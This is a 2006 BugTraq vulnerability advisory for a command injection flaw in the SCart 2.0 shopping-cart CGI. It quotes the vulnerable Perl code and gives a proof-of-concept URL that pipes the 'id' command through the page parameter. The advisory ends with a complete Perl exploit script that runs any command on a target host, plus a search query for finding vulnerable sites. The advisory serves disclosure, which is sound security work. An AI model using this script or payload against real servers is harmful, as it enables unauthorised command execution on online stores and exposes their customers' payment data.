BugTraq
[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution Jun 03 2006 08:01AM
eufrato gmail com
____________________ ___ ___ ________

\_ _____/\_ ___ \ / | \\_____ \

| __)_ / \ \// ~ \/ | \

| \\ \___\ Y / | /_______ / \______ /\___|_ /\_______ /

\/ \/ \/ \/

.OR.ID

ECHO_ADV_32$2006

------------------------------------------------------------------------
---

[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution

------------------------------------------------------------------------
---

Author : M.Hasran Addahroni a.k.a K-159

Date : June, 3th 2006

Location : Indonesia, Bali

Web : http://advisories.echo.or.id/adv/adv32-K-159-2006.txt

Critical Lvl : Highly critical

Impact : System access

Where : From Remote

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SCart

Application : SCart

version : 2.0

URL : http://www.scartserver.com

Description :

SCart is a free shopping cart online store service with e-commerce and real-time credit card and check payment processing service.

------------------------------------------------------------------------
---

Vulnerability:

~~~~~~~~~~~~~~~~

In scart.cgi we have source code like this

-----------------------scart.cgi-----------------------------

...

require 'scart.pl';

require '/home/scart/cgi-bin/2.0/scartserver.cgi';

...

--------------------------------------------------------------

then at scartserver.cgi in cgi-bin folder the code like this

---------------scartserver.cgi--------------------------------

...

$HTML{TAB2} = "$baseurl$cgiurl/?action=show_page&base=base2.html&page=browse.txt";

$HTML{TAB3} = "$baseurl$cgiurl/?action=show_page&base=base3.html&page=specials.txt";

$HTML{BUTTONBAR} = $buttonbar;

$HTML{VIEWCART} = "$baseurl$cgiurl?action=viewcart";

$HTML{CHECKOUT} = "$secureurl$cgiurl?action=checkout";

$HTML{TRACK} = "$baseurl$cgiurl?action=show_track";

$HTML{HELP} = "$baseurl$cgiurl/?action=show_page&base=base.html&page=help.txt";

...

------------------------------------------------------------------

Variables $baseurl and $cgiurl are not properly sanitized.This can be used to execute arbitrary commands.

Proof Of Concept:

~~~~~~~~~~~~~~~~~

http://www.scartserver.com/2.0/[client_user_name]/scart.cgi/?action=show
_page&base=base2.html&page=|id|

Solution:

~~~~~~~~~

no solution yet

Notification:

~~~~~~~~~~~~

vendor was contact but no response.

------------------------------------------------------------------------
---

Shoutz:

~~~~~~~

~ ping - my dearest wife, for all the luv the tears n the breath

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten

~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,bayl
aw

~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit

~ newbie_hacker (at) yahoogroups (dot) com [email concealed]

~ #aikmel #e-c-h-o @irc.dal.net

------------------------------------------------------------------------
---

Contact:

~~~~~~~~

K-159 || echo|staff || eufrato[at]gmail[dot]com

Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:

~~~~~~~~~~~~

#!/usr/bin/perl

##

# SCart 2.0 Remote Code Execution Exploit

# Bugs Found & code By K-159

#

## base on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt

#

# echo.or.id (c) 2006

#

##

# usage:

# perl scart.pl <target> </path/> "cmd"

#

# Google Dork : site:scartserver.com

#

# Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc

#

# Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net

#

use IO::Socket;

use LWP::Simple;

sub Usage {

print STDERR "\n ========================================================= \r\n";

print STDERR " *SCart 2.0 Remote Code Execution Exploit* \r\n";

print STDERR " Bugs Found by K-159 \r\n";

print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n";

print STDERR " Usage: $0 <www.target.com> </path/> \"cmd\" \r\n";

print STDERR "============================================================= \r\n";

exit;

}

if (@ARGV < 3)

{

Usage();

}

$host = @ARGV[0];

$path = @ARGV[1];

$command = @ARGV[2];

print "\n[+] Conecting to $host\n";

my $result = get("http://$host$path/scart.cgi?action=show_page&base=base2.html&page=b
rowse.txt|$command|");

if (defined $result) {

print $result;

}

else {

print "Exploit Failed.\n";

}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus